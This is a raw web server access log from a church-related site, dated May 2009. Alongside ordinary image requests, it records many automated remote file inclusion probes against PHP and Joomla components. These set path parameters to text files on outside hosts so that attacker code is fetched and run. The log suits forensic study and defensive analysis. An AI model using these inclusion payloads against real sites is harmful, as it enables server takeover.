207.182.137.218 - - [31/May/2009:10:54:37 -0400] "GET /log/sdaglobal.org-access_log.4/index.php?include_location=http://www.mykr.net/bbs/data/data/copyright.txt?? HTTP/1.1" 404 321
123.143.98.5 - - [31/May/2009:10:56:19 -0400] "GET /log/sdaglobal.org-access_log.1/convert/mvcw.php?step=1&vwar_root=http://www.itemsnsale.com//js/id1.txt?? HTTP/1.1" 404 328
82.149.246.8 - - [31/May/2009:10:58:56 -0400] "GET / HTTP/1.1" 200 9432
85.18.117.101 - - [31/May/2009:11:00:06 -0400] "GET //error.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 291
85.18.117.101 - - [31/May/2009:11:00:06 -0400] "GET /log//error.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 295
85.18.117.101 - - [31/May/2009:11:00:06 -0400] "GET /log/sdaglobal.org-access_log%20%20//error.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 322
85.18.117.101 - - [31/May/2009:11:01:58 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//error.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 324
77.221.130.17 - - [31/May/2009:11:03:11 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 346
77.221.130.17 - - [31/May/2009:11:03:12 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 350
77.221.130.17 - - [31/May/2009:11:03:12 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 377
91.149.157.130 - - [31/May/2009:11:03:22 -0400] "GET /log/sdaglobal.org-access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 377
91.149.157.130 - - [31/May/2009:11:03:22 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 350
91.149.157.130 - - [31/May/2009:11:03:22 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 346
83.103.72.130 - - [31/May/2009:11:03:24 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 351
83.103.72.130 - - [31/May/2009:11:03:34 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 351
64.6.231.215 - - [31/May/2009:11:04:07 -0400] "GET /log/sdaglobal.org-access_log//modules/xt_conteudo/admin/spaw/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 352
64.6.231.215 - - [31/May/2009:11:04:07 -0400] "GET /log//modules/xt_conteudo/admin/spaw/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 327
64.6.231.215 - - [31/May/2009:11:04:08 -0400] "GET //modules/xt_conteudo/admin/spaw/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 323
64.6.231.215 - - [31/May/2009:11:04:56 -0400] "GET /log/sdaglobal.org-error_log//modules/xt_conteudo/admin/spaw/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 351
64.6.231.215 - - [31/May/2009:11:05:19 -0400] "GET /log/components/com_rsgallery/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 320
64.6.231.215 - - [31/May/2009:11:05:19 -0400] "GET /log/sdaglobal.org-error_log.1/components/com_rsgallery/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 346
64.6.231.215 - - [31/May/2009:11:05:19 -0400] "GET /components/com_rsgallery/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 316
64.6.231.215 - - [31/May/2009:11:05:40 -0400] "GET /log/sdaglobal.org-error_log.4/components/com_rsgallery/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 346
85.18.117.101 - - [31/May/2009:11:05:53 -0400] "GET /log/sdaglobal.org-access_log//error.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 320
85.18.117.101 - - [31/May/2009:11:06:14 -0400] "GET /log/sdaglobal.org-access_log.1//error.php?dir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 322
64.6.231.215 - - [31/May/2009:11:06:30 -0400] "GET /log/sdaglobal.org-error_log.1//public/displayCategory.php?adminpath=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 338
64.6.231.215 - - [31/May/2009:11:06:30 -0400] "GET //public/displayCategory.php?adminpath=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 308
64.6.231.215 - - [31/May/2009:11:06:30 -0400] "GET /log//public/displayCategory.php?adminpath=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 312
116.206.152.165 - - [31/May/2009:11:09:27 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
116.206.152.165 - - [31/May/2009:11:09:27 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
77.221.130.17 - - [31/May/2009:11:10:18 -0400] "GET /log/sdaglobal.org-access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 375
222.166.160.28 - - [31/May/2009:11:14:34 -0400] "GET / HTTP/1.1" 200 9432
203.168.193.3 - - [31/May/2009:11:14:40 -0400] "GET /images/russia.gif HTTP/1.1" 200 1039
203.168.193.3 - - [31/May/2009:11:14:40 -0400] "GET /images/spain.gif HTTP/1.1" 200 1360
203.168.193.3 - - [31/May/2009:11:14:41 -0400] "GET /images/thailand.gif HTTP/1.1" 200 1060
203.168.193.2 - - [31/May/2009:11:14:41 -0400] "GET /images/sweden.gif HTTP/1.1" 200 1104
203.168.222.35 - - [31/May/2009:11:14:41 -0400] "GET /images/vietnam.gif HTTP/1.1" 200 1055
203.168.193.2 - - [31/May/2009:11:14:41 -0400] "GET /images/3abn.gif HTTP/1.1" 200 3774
203.168.193.3 - - [31/May/2009:11:14:42 -0400] "GET /images/bibsab.gif HTTP/1.1" 200 2786
203.168.193.2 - - [31/May/2009:11:14:42 -0400] "GET /images/hopeint.jpg HTTP/1.1" 200 2596
203.168.222.34 - - [31/May/2009:11:14:42 -0400] "GET /images/vop.jpg HTTP/1.1" 200 2215
203.168.222.35 - - [31/May/2009:11:14:42 -0400] "GET /images/iiw.jpg HTTP/1.1" 200 2052
203.168.193.2 - - [31/May/2009:11:14:42 -0400] "GET /images/amazfact.gif HTTP/1.1" 200 2896
203.168.222.35 - - [31/May/2009:11:14:43 -0400] "GET /images/amazdisc.gif HTTP/1.1" 200 3426
203.168.193.2 - - [31/May/2009:11:14:43 -0400] "GET /images/omega.gif HTTP/1.1" 200 956
203.168.193.2 - - [31/May/2009:11:14:43 -0400] "GET /images/promesy.gif HTTP/1.1" 200 2097
203.168.193.2 - - [31/May/2009:11:14:43 -0400] "GET /images/bibplus.gif HTTP/1.1" 200 3598
203.168.222.34 - - [31/May/2009:11:14:44 -0400] "GET /images/hopetalk.gif HTTP/1.1" 200 3618
203.168.193.2 - - [31/May/2009:11:14:44 -0400] "GET /images/knowjes.gif HTTP/1.1" 200 3848
203.168.193.3 - - [31/May/2009:11:14:44 -0400] "GET /images/teachart.gif HTTP/1.1" 200 1484
203.168.193.3 - - [31/May/2009:11:14:44 -0400] "GET /images/gawake.gif HTTP/1.1" 200 3422
203.168.193.3 - - [31/May/2009:11:14:45 -0400] "GET /images/crusade.jpg HTTP/1.1" 200 4146
203.168.222.35 - - [31/May/2009:11:14:45 -0400] "GET /images/coming.jpg HTTP/1.1" 200 4137
203.168.222.35 - - [31/May/2009:11:14:45 -0400] "GET /images/voh.gif HTTP/1.1" 200 2001
203.168.222.34 - - [31/May/2009:11:14:45 -0400] "GET /images/nimenqu.gif HTTP/1.1" 200 3797
203.168.193.3 - - [31/May/2009:11:14:45 -0400] "GET /images/lamb.gif HTTP/1.1" 200 1920
203.168.222.34 - - [31/May/2009:11:14:45 -0400] "GET /images/lamp.gif HTTP/1.1" 200 2052
203.168.222.34 - - [31/May/2009:11:14:45 -0400] "GET /images/tempcat.jpg HTTP/1.1" 200 2385
203.168.193.3 - - [31/May/2009:11:14:46 -0400] "GET /images/biblight.gif HTTP/1.1" 200 2510
203.168.222.34 - - [31/May/2009:11:14:46 -0400] "GET /images/lgtbearer.gif HTTP/1.1" 200 1337
203.168.222.34 - - [31/May/2009:11:14:46 -0400] "GET /images/bibuniv.gif HTTP/1.1" 200 1078
203.168.193.3 - - [31/May/2009:11:14:46 -0400] "GET /images/newstart.gif HTTP/1.1" 200 2173
203.168.222.35 - - [31/May/2009:11:14:47 -0400] "GET /images/ligtlife.gif HTTP/1.1" 200 2954
203.168.222.35 - - [31/May/2009:11:14:47 -0400] "GET /images/fuyinchina.gif HTTP/1.1" 200 4865
203.168.222.34 - - [31/May/2009:11:14:47 -0400] "GET /images/bibleinfo.gif HTTP/1.1" 200 1949
203.168.193.2 - - [31/May/2009:11:14:47 -0400] "GET /images/revival.gif HTTP/1.1" 200 3110
203.168.222.34 - - [31/May/2009:11:14:47 -0400] "GET /images/gcclub.gif HTTP/1.1" 200 2947
203.168.222.35 - - [31/May/2009:11:14:47 -0400] "GET /images/ellenwhite.gif HTTP/1.1" 200 2251
203.168.222.34 - - [31/May/2009:11:14:47 -0400] "GET /images/24seven.gif HTTP/1.1" 200 1352
203.168.193.3 - - [31/May/2009:11:14:47 -0400] "GET /images/wrlcrisis.gif HTTP/1.1" 200 2123
203.168.222.35 - - [31/May/2009:11:14:48 -0400] "GET /images/advtoday.gif HTTP/1.1" 200 2122
203.168.193.2 - - [31/May/2009:11:14:48 -0400] "GET /images/sign.gif HTTP/1.1" 200 3556
203.168.193.3 - - [31/May/2009:11:14:48 -0400] "GET /images/shenyang.jpg HTTP/1.1" 200 4020
203.168.222.35 - - [31/May/2009:11:14:48 -0400] "GET /images/zjjs.gif HTTP/1.1" 200 1559
203.168.222.34 - - [31/May/2009:11:14:48 -0400] "GET /images/anxiyuan.gif HTTP/1.1" 200 2006
203.168.222.34 - - [31/May/2009:11:14:48 -0400] "GET /images/creatn.gif HTTP/1.1" 200 3508
203.168.222.34 - - [31/May/2009:11:14:48 -0400] "GET /images/garhvn.jpg HTTP/1.1" 200 1992
203.168.222.35 - - [31/May/2009:11:14:49 -0400] "GET /images/truth7.gif HTTP/1.1" 200 3910
203.168.193.3 - - [31/May/2009:11:14:49 -0400] "GET /images/gce.jpg HTTP/1.1" 200 4416
203.168.193.3 - - [31/May/2009:11:14:49 -0400] "GET /images/region.gif HTTP/1.1" 200 1356
203.168.222.35 - - [31/May/2009:11:14:49 -0400] "GET /images/kowloon.gif HTTP/1.1" 200 3883
203.168.222.35 - - [31/May/2009:11:14:49 -0400] "GET /images/twchurch.gif HTTP/1.1" 200 3454
203.168.193.2 - - [31/May/2009:11:14:49 -0400] "GET /images/bayview.gif HTTP/1.1" 200 2926
203.168.222.34 - - [31/May/2009:11:14:49 -0400] "GET /images/taipei.gif HTTP/1.1" 200 4499
203.168.193.2 - - [31/May/2009:11:14:49 -0400] "GET /images/auccf.gif HTTP/1.1" 200 2436
203.168.193.2 - - [31/May/2009:11:14:50 -0400] "GET /images/hacienda.gif HTTP/1.1" 200 2351
222.166.160.10 - - [31/May/2009:11:14:51 -0400] "GET /favicon.ico HTTP/1.1" 404 292
222.166.160.138 - - [31/May/2009:11:14:55 -0400] "GET /favicon.ico HTTP/1.1" 404 292
121.165.73.157 - - [31/May/2009:11:16:12 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//vwar/admin/admin.php?vware_root=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 335
121.165.73.157 - - [31/May/2009:11:16:12 -0400] "GET /log//vwar/admin/admin.php?vware_root=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 306
121.165.73.157 - - [31/May/2009:11:16:12 -0400] "GET //vwar/admin/admin.php?vware_root=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 302
69.59.195.55 - - [31/May/2009:11:18:33 -0400] "GET /log/sdaglobal.org-access_log.3/http://jamers.org/idx? HTTP/1.1" 404 333
69.59.195.55 - - [31/May/2009:11:18:34 -0400] "GET /http://jamers.org/idx? HTTP/1.1" 404 302
69.59.195.55 - - [31/May/2009:11:18:34 -0400] "GET /log/http://jamers.org/idx? HTTP/1.1" 404 306
121.0.141.241 - - [31/May/2009:11:19:13 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 317
121.0.141.241 - - [31/May/2009:11:19:13 -0400] "GET /log/components/com_performs/performs.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 321
121.0.141.241 - - [31/May/2009:11:19:13 -0400] "GET /log/sdaglobal.org-access_log/components/com_performs/performs.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 346
77.221.130.13 - - [31/May/2009:11:20:06 -0400] "GET /log/sdaglobal.org-access_log.3/http://jamers.org/idx? HTTP/1.1" 404 333
77.221.130.13 - - [31/May/2009:11:20:06 -0400] "GET /http://jamers.org/idx? HTTP/1.1" 404 302
77.221.130.13 - - [31/May/2009:11:20:06 -0400] "GET /log/http://jamers.org/idx? HTTP/1.1" 404 306
121.165.73.157 - - [31/May/2009:11:21:41 -0400] "GET /log/sdaglobal.org-access_log.1//vwar/admin/admin.php?vware_root=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 333
121.0.141.241 - - [31/May/2009:11:21:43 -0400] "GET /log/sdaglobal.org-access_log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 348
69.237.82.158 - - [31/May/2009:11:21:57 -0400] "GET //vwar/admin/admin.php?vware_root=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 302
69.237.82.158 - - [31/May/2009:11:21:57 -0400] "GET /log//vwar/admin/admin.php?vware_root=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 306
69.237.82.158 - - [31/May/2009:11:21:57 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//vwar/admin/admin.php?vware_root=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 335
194.0.200.15 - - [31/May/2009:11:22:21 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 347
194.0.200.15 - - [31/May/2009:11:22:21 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 347
194.0.200.15 - - [31/May/2009:11:22:21 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 347
194.0.200.15 - - [31/May/2009:11:22:21 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 316
194.0.200.15 - - [31/May/2009:11:22:21 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 316
194.0.200.15 - - [31/May/2009:11:22:21 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 316
194.0.200.15 - - [31/May/2009:11:22:21 -0400] "GET /log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 320
194.0.200.15 - - [31/May/2009:11:22:21 -0400] "GET /log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 320
194.0.200.15 - - [31/May/2009:11:22:21 -0400] "GET /log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 320
194.0.200.15 - - [31/May/2009:11:22:30 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 347
194.0.200.15 - - [31/May/2009:11:22:30 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 316
194.0.200.15 - - [31/May/2009:11:22:30 -0400] "GET /log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/bratid.txt?? HTTP/1.1" 404 320
77.221.130.13 - - [31/May/2009:11:22:34 -0400] "GET /http://jamers.org/idx? HTTP/1.1" 404 302
77.221.130.13 - - [31/May/2009:11:22:36 -0400] "GET /log/sdaglobal.org-access_log.3/http://jamers.org/idx? HTTP/1.1" 404 333
77.221.130.13 - - [31/May/2009:11:22:36 -0400] "GET /http://jamers.org/idx? HTTP/1.1" 404 302
77.221.130.13 - - [31/May/2009:11:22:36 -0400] "GET /log/http://jamers.org/idx? HTTP/1.1" 404 306
69.59.195.55 - - [31/May/2009:11:23:00 -0400] "GET /http://jamers.org/idx? HTTP/1.1" 404 302
121.0.141.241 - - [31/May/2009:11:23:26 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//components/com_forum/download.php?phpbb_root_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 348
121.0.141.241 - - [31/May/2009:11:23:26 -0400] "GET /log//components/com_forum/download.php?phpbb_root_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 319
121.0.141.241 - - [31/May/2009:11:23:26 -0400] "GET //components/com_forum/download.php?phpbb_root_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 315
77.221.130.13 - - [31/May/2009:11:24:17 -0400] "GET /http://jamers.org/idx? HTTP/1.1" 404 302
220.255.7.182 - - [31/May/2009:11:25:16 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
220.255.7.177 - - [31/May/2009:11:25:20 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
80.59.178.71 - - [31/May/2009:11:25:30 -0400] "GET /log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 348
80.59.178.71 - - [31/May/2009:11:25:30 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 344
80.59.178.71 - - [31/May/2009:11:25:30 -0400] "GET /log/sdaglobal.org-access_log.4//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 375
121.0.141.241 - - [31/May/2009:11:25:48 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_forum/download.php?phpbb_root_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 348
69.237.82.158 - - [31/May/2009:11:26:32 -0400] "GET /log/sdaglobal.org-access_log.1//vwar/admin/admin.php?vware_root=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 333
83.103.72.130 - - [31/May/2009:11:26:35 -0400] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320
83.103.72.130 - - [31/May/2009:11:26:37 -0400] "GET /log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 324
83.103.72.130 - - [31/May/2009:11:26:38 -0400] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320
83.103.72.130 - - [31/May/2009:11:26:38 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 353
83.103.72.130 - - [31/May/2009:11:26:38 -0400] "GET /log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 324
83.103.72.130 - - [31/May/2009:11:26:41 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 353
80.59.178.71 - - [31/May/2009:11:28:01 -0400] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 375
69.59.195.55 - - [31/May/2009:11:32:45 -0400] "GET /log/sdaglobal.org-error_log.4/http://jamers.org/idx? HTTP/1.1" 404 332
121.0.141.241 - - [31/May/2009:11:35:56 -0400] "GET /log/sdaglobal.org-access_log.3//components/com_forum/download.php?phpbb_root_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 346
77.221.130.13 - - [31/May/2009:11:36:07 -0400] "GET /log/sdaglobal.org-error_log.4/http://jamers.org/idx? HTTP/1.1" 404 332
69.59.195.55 - - [31/May/2009:11:37:18 -0400] "GET /log/sdaglobal.org-error_log.1/http://jamers.org/idx? HTTP/1.1" 404 332
69.59.195.55 - - [31/May/2009:11:37:18 -0400] "GET /http://jamers.org/idx? HTTP/1.1" 404 302
69.59.195.55 - - [31/May/2009:11:37:19 -0400] "GET /log/http://jamers.org/idx? HTTP/1.1" 404 306
77.221.130.13 - - [31/May/2009:11:38:02 -0400] "GET /log/sdaglobal.org-error_log.4/http://jamers.org/idx? HTTP/1.1" 404 332
83.103.72.130 - - [31/May/2009:11:41:54 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 351
83.103.72.130 - - [31/May/2009:11:42:09 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 351
83.103.72.130 - - [31/May/2009:11:43:03 -0400] "GET /log/sdaglobal.org-access_log.4//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 351
116.36.213.166 - - [31/May/2009:11:44:06 -0400] "GET /?sourcedir=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 200 9432
116.36.213.166 - - [31/May/2009:11:44:07 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 310
116.36.213.166 - - [31/May/2009:11:44:08 -0400] "GET /log/?sourcedir=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 200 58346
116.36.213.166 - - [31/May/2009:11:44:31 -0400] "GET /log/sdaglobal.org-access_log%20%20/?sourcedir=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 312
116.36.213.166 - - [31/May/2009:11:44:31 -0400] "GET /?sourcedir=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 200 9432
116.36.213.166 - - [31/May/2009:11:44:30 -0400] "GET /log/?sourcedir=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 200 58346
91.121.137.51 - - [31/May/2009:11:47:05 -0400] "GET /log/sdaglobal.org-access_log.1//include.php?path[docroot]=http://www.eyepro.net//assets/images/master-id.txt? HTTP/1.1" 404 324
91.121.137.51 - - [31/May/2009:11:47:06 -0400] "GET //include.php?path[docroot]=http://www.eyepro.net//assets/images/master-id.txt? HTTP/1.1" 404 293
91.121.137.51 - - [31/May/2009:11:47:06 -0400] "GET /log//include.php?path[docroot]=http://www.eyepro.net//assets/images/master-id.txt? HTTP/1.1" 404 297
61.58.169.105 - - [31/May/2009:11:47:13 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
116.36.213.166 - - [31/May/2009:11:47:39 -0400] "GET /log/sdaglobal.org-access_log/?sourcedir=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 310
116.36.213.166 - - [31/May/2009:11:47:39 -0400] "GET /?sourcedir=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 200 9432
116.36.213.166 - - [31/May/2009:11:47:39 -0400] "GET /log/?sourcedir=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 200 58346
77.221.130.13 - - [31/May/2009:11:47:54 -0400] "GET /log/sdaglobal.org-error_log.1/http://jamers.org/idx? HTTP/1.1" 404 332
77.221.130.13 - - [31/May/2009:11:47:54 -0400] "GET /http://jamers.org/idx? HTTP/1.1" 404 302
